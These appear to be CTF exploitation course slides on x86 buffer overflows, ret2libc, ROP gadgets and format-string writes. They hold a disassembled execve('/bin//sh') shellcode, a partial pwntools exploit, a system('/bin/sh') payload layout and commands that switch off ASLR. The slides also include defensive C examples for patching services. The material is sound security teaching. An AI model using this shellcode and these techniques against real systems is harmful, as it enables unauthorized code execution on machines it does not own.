TDOH x 台科 pwn course
15. Outline
• Buffer Overflow
• ROP ( Return Oriented Programing )
• ret2libc
• ret2text
• gadgets
• format string vulnerability
• CTF ( Attack & Defense )
18. x86 Stack Layout
(higher addresses at the top; everything in the frame is addressed relative to EBP)

    …            further arguments
    EBP + 0x0C   Arg 2
    EBP + 0x08   Arg 1
    EBP + 0x04   Return Address
    EBP          saved EBP
    EBP - 0x04   buffer
    EBP - 0x08   buffer   >> writes into buffer run toward higher addresses, i.e. toward EBP and the Return Address
19. Buffer Overflow
void Function( arg1, arg2 ) {
    char buffer[16];
    …
    …
    scanf("%s", buffer);   /* no length limit: anything past 16 bytes overwrites what sits above buffer */
    …
    …
}

Prologue:
    push ebp
    mov ebp, esp
    sub esp, 0x10          ; reserve the 16 bytes of buffer
    …
    …

Frame after the prologue (higher addresses at the top):
    EBP + 0x0C   arg2
    EBP + 0x08   arg1
    EBP + 0x04   Return Address
    EBP          saved EBP
    EBP - 0x04   buffer[12..15]
    EBP - 0x08   buffer[8..11]
    EBP - 0x0C   buffer[4..7]
    EBP - 0x10   buffer[0..3]    <--- scanf() writes from here upward
21. Buffer Overflow
The same frame after a long input of 'A's: the bytes fill buffer, then the saved EBP, then the Return Address.
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
31. Step #3
from pwn import *
r = process('./pratice1')
eip =
payload = 'a' * + p32(eip)
r.sendline(payload)
r.interactive()
37. Step #2
• Stack
• gdb ? gdb stack
• coredump
$ ulimit -c unlimited
$ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'
• jmp esp
41. Step #3
08048062 <starter>:
8048062: 31 c0 xor eax,eax
8048064: 40 inc eax
8048065: 40 inc eax
8048066: 40 inc eax
8048067: 40 inc eax
8048068: 40 inc eax
8048069: 40 inc eax
804806a: 40 inc eax
804806b: 40 inc eax
804806c: 40 inc eax
804806d: 40 inc eax
804806e: 40 inc eax
804806f: 31 c9 xor ecx,ecx
8048071: 51 push ecx
8048072: 68 2f 2f 73 68 push 0x68732f2f
8048077: 68 2f 62 69 6e push 0x6e69622f
804807c: 89 e3 mov ebx,esp
804807e: 31 d2 xor edx,edx
8048080: cd 80 int 0x80
Register state at int 0x80:
ebx = esp -> "/bin//sh\0"   (the two pushes spell the string; the pushed ecx = 0 terminates it)
ecx = 0
eax = 11   (execve)
edx = 0
execve
60. Step #2
• system ?
• “/bin/sh” ?
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
61. Step #3
• Write Payload (low address at the top):
    aaaa
    aaaa
    aaaa
    aaaa
    aaaa               padding up to the saved Return Address
    system addr        overwrites the Return Address
    fake ret address   where system() returns to
    "/bin/sh"          pointer to the string, system()'s argument
65. ROP - gadgets
R/W Register:
pop eax
ret
R/W Memory:
pop edx
pop eax
mov [eax],edx
ret
Logical Operation:
xor eax,eax
and eax,ecx
85. • overflow binary puts write
fwrite …… got stdout
• got
• system "/bin/sh"
• overflow
system(“/bin/sh”)
89. • pwntools ELF binary
• pwntools ELF.symbol[func_name] plt
• pwntools ELF.got[function_name] got
• puts leak got
• system "/bin/sh"
97. • format String %n
• %hn %hhn
• %n 4 byte (int)
• %hn 2 byte (short)
• %hhn 1 byte (byte)
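An added example (not from the course slides) that makes the three write widths concrete: it fills a 4-byte slot with 0xFF bytes, prints a chosen number of characters, and lets %n, %hn or %hhn store the character count into the slot through a union, so the bytes each conversion leaves untouched are visible. It assumes a little-endian target, as in the x86 material above. The format strings here are fixed literals, which is the safe way to use %n; the vulnerability on the slide is letting the user supply the format string, shown at the bottom as the commented-out unsafe form beside its safe replacement.

```c
#include <stdint.h>
#include <stdio.h>

/* Fill a 4-byte slot with 0xFF, print `width` characters, then let the chosen
 * conversion store the character count into the slot.
 *   mode 4 -> %n   (int,   4 bytes written)
 *   mode 2 -> %hn  (short, 2 bytes written)
 *   mode 1 -> %hhn (char,  1 byte written)
 * The union is the legal C way to view the same bytes as int/short/char.
 * Little-endian layout assumed (x86), so the low bytes are the ones written.
 * Returns the slot as a 32-bit word so the untouched 0xFF bytes stay visible. */
uint32_t write_count(int mode, int width) {
    union { uint32_t word; int i; short s; signed char c; } slot;
    char out[64];   /* snprintf may truncate the text, but %n still counts every
                       character that would have been printed */
    slot.word = 0xFFFFFFFFu;
    switch (mode) {
    case 4: snprintf(out, sizeof out, "%*d%n",   width, 0, &slot.i); break;
    case 2: snprintf(out, sizeof out, "%*d%hn",  width, 0, &slot.s); break;
    case 1: snprintf(out, sizeof out, "%*d%hhn", width, 0, &slot.c); break;
    default: break;
    }
    return slot.word;
}

/* Safe and unsafe ways to echo text a user controls. In the unsafe form the
 * user's bytes become the format, so a %n among them is a memory write.
 * gcc -Wformat -Wformat-security flags the unsafe line at compile time. */
void echo_safe(const char *user) { printf("%s", user); }
/* void echo_unsafe(const char *user) { printf(user); }   -- never do this */

int main(void) {
    printf("%%n   after 4 chars   -> %08x\n", (unsigned)write_count(4, 4));
    printf("%%hn  after 4 chars   -> %08x\n", (unsigned)write_count(2, 4));
    printf("%%hhn after 4 chars   -> %08x\n", (unsigned)write_count(1, 4));
    printf("%%hhn after 300 chars -> %08x (count 0x12c truncated to one byte)\n",
           (unsigned)write_count(1, 300));
    echo_safe("%n is plain data here, not a format\n");
    return 0;
}
```

The last call is the reason %hhn matters to the slide's point: the count keeps growing, but only its low byte lands in memory, so each byte of a target word can be set independently by padding the output to the right length.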
106. IO Wrapper
• ?
• fork()
• pid_t pid = fork();
  if ( pid == 0 ) {
      /* sub process */
      execvpe(…);
  } else {
      /* parent */
  }
108. IO Wrapper
• while ( true ) {
      fread(…, stdin);                    /* may block */
      fwrite(…, stdin_of_sub_process);
      fread(…, stdout_of_sub_process);    /* may block */
      fwrite(…, stdout);
  }
IO Blocked: each fread() waits until its side has data, so the loop stalls whenever the other side is the one that wants to talk.
110. IO Wrapper
• select() and pselect() allow a program to monitor
multiple file descriptors, waiting until one or more of
the file descriptors become "ready" for some class
of I/O operation (e.g., input possible). A file
descriptor is considered ready if it is possible to
perform a corresponding I/O operation (e.g.,
read(2) without blocking, or a sufficiently small
write(2)).
http://man7.org/linux/man-pages/man2/select.2.html
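The wrapper sketched on the three IO Wrapper slides, as an added example that is not the course's own code: fork() a child with its stdin and stdout on pipes, then relay with select() instead of the blind fread/fwrite sequence, so the parent only touches a descriptor once select() says it is ready. For the self-check the wrapper's own side is a byte buffer on input and a collecting buffer on output (in a real attack-and-defense wrapper these would be the wrapper's stdin/stdout plus a traffic log); run_wrapped(), demo_cat() and the sample line are assumptions of this example, and execvp() stands in for the slide's execvpe().

```c
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Start argv[] as a child whose stdin/stdout are pipes we own, feed it `input`
 * (len bytes) and collect everything it prints into out (outsz bytes,
 * NUL-terminated). select() decides each round whether the child can take more
 * input or has output ready, so a quiet child never stalls the loop.
 * Returns the number of bytes collected, or -1 on error. */
ssize_t run_wrapped(char *const argv[], const char *input, size_t len,
                    char *out, size_t outsz) {
    int to_child[2], from_child[2];
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (pipe(to_child) < 0 || pipe(from_child) < 0) return -1;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                         /* sub process: wire pipes to stdio, then exec */
        dup2(to_child[0], STDIN_FILENO);
        dup2(from_child[1], STDOUT_FILENO);
        close(to_child[0]);  close(to_child[1]);
        close(from_child[0]); close(from_child[1]);
        execvp(argv[0], argv);
        _exit(127);
    }
    /* parent */
    signal(SIGPIPE, SIG_IGN);               /* a child that exits early must not kill us */
    close(to_child[0]);                     /* keep only the write end ... */
    close(from_child[1]);                   /* ... and the read end */
    int wfd = to_child[1], rfd = from_child[0];
    fcntl(wfd, F_SETFL, O_NONBLOCK);        /* select() promises some room, not all of it */

    size_t sent = 0, got = 0;
    while (rfd >= 0) {
        fd_set rs, ws;
        FD_ZERO(&rs); FD_ZERO(&ws);
        FD_SET(rfd, &rs);
        if (wfd >= 0) FD_SET(wfd, &ws);
        int maxfd = rfd > wfd ? rfd : wfd;
        if (select(maxfd + 1, &rs, &ws, NULL, NULL) < 0) {
            if (errno == EINTR) continue;
            break;
        }
        if (wfd >= 0 && FD_ISSET(wfd, &ws)) {
            ssize_t n = write(wfd, input + sent, len - sent);
            if (n > 0) sent += (size_t)n;
            else if (n < 0 && errno != EAGAIN && errno != EINTR) sent = len;  /* child gone: give up */
            if (sent == len) { close(wfd); wfd = -1; }   /* EOF tells the child we are done */
        }
        if (FD_ISSET(rfd, &rs)) {
            ssize_t n = read(rfd, out + got, outsz - 1 - got);
            if (n <= 0) { close(rfd); rfd = -1; }        /* child closed stdout, or out is full */
            else got += (size_t)n;
        }
    }
    if (wfd >= 0) close(wfd);
    waitpid(pid, NULL, 0);
    out[got] = '\0';
    return (ssize_t)got;
}

/* Self-check with a constructed input: `cat` must echo back exactly what we sent. */
ssize_t demo_cat(char *out, size_t outsz) {
    char *cat_argv[] = { "cat", NULL };
    const char *msg = "hello from wrapper\n";     /* constructed sample input */
    return run_wrapped(cat_argv, msg, strlen(msg), out, outsz);
}

int main(void) {
    char out[256];
    ssize_t n = demo_cat(out, sizeof out);
    printf("child echoed %zd bytes: %s", n, out);
    return n < 0;
}
```

Two details carry the slide's point. The child's stdin is closed as soon as the input is delivered, which is the EOF the child needs to finish; and the write end is non-blocking, because select() only guarantees that some bytes can be written, so a blocking write() of a large buffer could still stall the loop the same way the slide's fread() does.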
119. LD_PRELOAD
• $ gcc -Wall -fpic -shared -o mylib.so mylib.c
• $ gcc -o main main.c
• $ LD_PRELOAD=./mylib.so ./main
  (the variable must be set on the same command line, or exported; set on a line of its own it never reaches the loader)
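An added example tying the Buffer Overflow slide (scanf("%s") into a 16-byte buffer) to this LD_PRELOAD recipe, written for this page rather than taken from the course: mylib.c defines a bounded line reader and exports it under the name of an unbounded libc read, so a service in an attack-and-defense CTF can be patched at run time with the three commands above and no rebuild. The target that calls gets(), the SAFE_LEN of 16, and the self-check input are assumptions of this example; gets() is chosen because, unlike the variadic scanf(), it can be interposed in a few lines.

```c
#include <stdio.h>
#include <string.h>

#define SAFE_LEN 16   /* assumed: the 16-byte buffer the target reserves, as in
                         the Buffer Overflow slide's char buffer[16] */

/* Bounded replacement for an unbounded line read: at most n-1 bytes land in s,
 * the newline is dropped, and the rest of an over-long line is consumed so it
 * cannot spill into the next read. Returns s, or NULL at EOF with nothing read. */
char *bounded_gets(char *s, size_t n, FILE *f) {
    if (n == 0 || !fgets(s, (int)n, f)) return NULL;
    size_t len = strlen(s);
    if (len > 0 && s[len - 1] == '\n') {
        s[len - 1] = '\0';
    } else if (len == n - 1) {              /* line longer than the buffer: eat the tail */
        int c;
        while ((c = fgetc(f)) != EOF && c != '\n') { }
    }
    return s;
}

/* The interposed symbol. With LD_PRELOAD=./mylib.so the dynamic linker binds
 * the target's call to gets() here instead of to libc, so the binary is patched
 * without being touched. (Hypothetical target: one that calls gets().) */
char *gets(char *s) {
    return bounded_gets(s, SAFE_LEN, stdin);
}

/* Constructed sample input for a self-check: a 32-byte line, then a short one. */
FILE *constructed_input(void) {
    FILE *f = tmpfile();
    if (f) {
        fputs("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nnext\n", f);
        rewind(f);
    }
    return f;
}

/* Stand-alone check: read one line from stdin through the bounded reader. */
int main(void) {
    char buffer[SAFE_LEN];
    if (bounded_gets(buffer, sizeof buffer, stdin))
        printf("read %zu bytes safely: %s\n", strlen(buffer), buffer);
    return 0;
}
```

The tail-eating branch is the part that is easy to forget: without it, the unread remainder of a long line becomes the next read's input, which turns a bounded read into a way to desynchronise the service's protocol instead of a fix. Interposition only works for functions the target resolves dynamically; a statically linked or inlined read has to be patched in the binary itself.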